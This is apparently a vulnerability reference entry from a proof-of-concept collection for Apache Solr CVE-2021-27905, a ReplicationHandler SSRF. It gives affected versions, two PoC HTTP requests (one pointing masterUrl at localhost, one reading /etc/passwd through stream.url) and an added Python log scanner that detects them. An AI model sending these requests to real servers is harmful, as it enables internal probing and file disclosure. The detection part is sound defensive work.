Awesome-POC/Web服务器漏洞/Apache Solr Replication handler SSRF CVE-2021-27905.md
2023-07-11 10:57:15 +08:00

# Apache Solr Replication handler SSRF CVE-2021-27905
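## Vulnerability description
Apache Solr is an open-source search server. Solr is written in Java and is built mainly on HTTP and Apache Lucene. The vulnerability is in the ReplicationHandler: its masterUrl parameter (leaderUrl parameter) can designate the ReplicationHandler on another Solr core, from which index data is replicated to the local core. Successful exploitation results in server-side request forgery (SSRF).
Reference: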
* https://nvd.nist.gov/vuln/detail/CVE-2021-27905
## Affected versions
```
Apache Solr 7.0.0 - 7.7.3
Apache Solr 8.0.0 - 8.8.1
```
### Reproduction
PoC:
```
GET /solr/test/replication?command=fetchindex&masterUrl=http://127.0.0.1/&wt=json&httpBasicAuthUser=&httpBasicAuthPassword= HTTP/1.1
HOST:target
....
```
```
GET http://xxxxx/solr/xxxx/debug/dump?stream.url=file:///etc/passwd&param=ContentStream HTTP/1.1
HOST:target
...
```
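
A log check for the two request shapes shown above, as an added example that is not part of the original repository: it scans request-log lines for `fetchindex` calls carrying `masterUrl`/`leaderUrl` and for `stream.url`, and marks destinations that are literal internal addresses or `file:` URLs. The NCSA-style log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in an assumed NCSA-style request-log format.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Jul/2023:10:57:15 +0800] "GET /solr/test/replication?command=fetchindex&masterUrl=http://127.0.0.1/&wt=json HTTP/1.1" 200 120
10.0.0.5 - - [11/Jul/2023:10:57:20 +0800] "GET /solr/test/replication?command=FetchIndex&leaderUrl=http%3A%2F%2F10.0.0.12%3A8080%2F HTTP/1.1" 200 98
10.0.0.9 - - [11/Jul/2023:10:58:01 +0800] "GET /solr/test/debug/dump?stream.url=file:///etc/passwd&param=ContentStream HTTP/1.1" 200 2048
10.0.0.7 - - [11/Jul/2023:10:59:00 +0800] "GET /solr/test/replication?command=details&wt=json HTTP/1.1" 200 512
10.0.0.7 - - [11/Jul/2023:10:59:30 +0800] "GET /solr/test/select?q=masterUrl HTTP/1.1" 200 77
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def is_internal(url):
    """True if the URL host is a literal loopback, private or link-local IP."""
    host = urlsplit(url).hostname or ""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname; it is not resolved here
    return ip.is_loopback or ip.is_private or ip.is_link_local

def scan(log_text):
    """Return (client, rule, url, internal_or_file) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        # parse_qs URL-decodes values; names are lowercased so case variants are not missed.
        params = {k.lower(): v[0] for k, v in parse_qs(parts.query).items()}
        path = parts.path.rstrip("/").lower()
        if path.endswith("/replication") and params.get("command", "").lower() == "fetchindex":
            url = params.get("masterurl") or params.get("leaderurl")
            if url:
                findings.append((client, "replication-fetchindex-url", url, is_internal(url)))
        if "stream.url" in params:
            url = params["stream.url"]
            local = urlsplit(url).scheme == "file" or is_internal(url)
            findings.append((client, "stream-url", url, local))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Only query strings are inspected, so parameters sent in a POST body are not visible to this check unless the log records them.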